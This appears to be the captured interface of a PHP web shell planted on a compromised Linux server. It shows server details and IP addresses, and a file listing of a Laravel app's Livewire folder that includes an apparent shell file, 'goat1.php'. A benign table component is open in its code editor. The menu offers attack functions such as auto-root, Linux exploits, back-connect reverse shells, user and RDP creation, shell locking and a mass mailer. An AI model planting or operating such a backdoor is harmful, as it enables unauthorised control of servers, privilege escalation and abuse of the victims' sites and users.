Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo2.com /
app /
Livewire /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
AdminTable.php
2.85
KB
-rw-r--r--
BrandTable.php
1.53
KB
-rw-r--r--
CashPaymentTable.php
5.73
KB
-rw-r--r--
CurrenciesTable.php
1.99
KB
-rw-r--r--
CustomCalendars.php
2.61
KB
-rw-r--r--
Dashboard.php
674
B
-rw-r--r--
EnquiryTable.php
2.9
KB
-rw-r--r--
EventScheduleTable.php
3.14
KB
-rw-r--r--
EventScheduledEventTable.php
2.43
KB
-rw-r--r--
Events.php
3.7
KB
-rw-r--r--
FaqTable.php
1.58
KB
-rw-r--r--
FrontTestimonialTable.php
1.86
KB
-rw-r--r--
LivewireTableComponent.php
1.85
KB
-rw-r--r--
PersonalExperienceTable.php
1.49
KB
-rw-r--r--
ScheduleTransactionTable.php
2.92
KB
-rw-r--r--
Schedules.php
2.84
KB
-rw-r--r--
SearchableComponent.php
2.7
KB
-rw-r--r--
SubscribersTable.php
1.28
KB
-rw-r--r--
SubscriptionPlanTable.php
4.01
KB
-rw-r--r--
SubscriptionTransactionTable.p...
3.3
KB
-rw-r--r--
UserDashboard.php
1.32
KB
-rw-r--r--
UserEvent.php
1.14
KB
-rw-r--r--
UserTable.php
3.26
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PersonalExperienceTable.php
<?php namespace App\Livewire; use App\Models\PersonalExperience; use Rappasoft\LaravelLivewireTables\Views\Column; class PersonalExperienceTable extends LivewireTableComponent { protected $model = PersonalExperience::class; public string $tableName = 'personal_experiences'; public $showButtonOnHeader = true; public $buttonComponent = 'personal_experiences.component.add_button'; public function configure(): void { $this->setPrimaryKey('id')->setQueryStringStatus(false) ; $this->setDefaultSort('created_at', 'desc'); $this->setTdAttributes(function (Column $column, $row, $columnIndex, $rowIndex) { if ($columnIndex == '1') { return [ 'style' => 'text-align:center,padding-left:0!important', 'width' => '8%', ]; } return []; }); } public function placeholder() { return view('livewire.listing-skeleton'); } public function columns(): array { return [ Column::make(__('messages.common.name'), 'name') ->sortable()->searchable()->view('personal_experiences.component.name'), Column::make(__('messages.common.action'), 'id')->view('personal_experiences.component.action'), Column::make('created_at')->sortable()->hideIf(true), ]; } public function resetPageTable() { $this->customResetPage('personal_experiencesPage'); } }
Close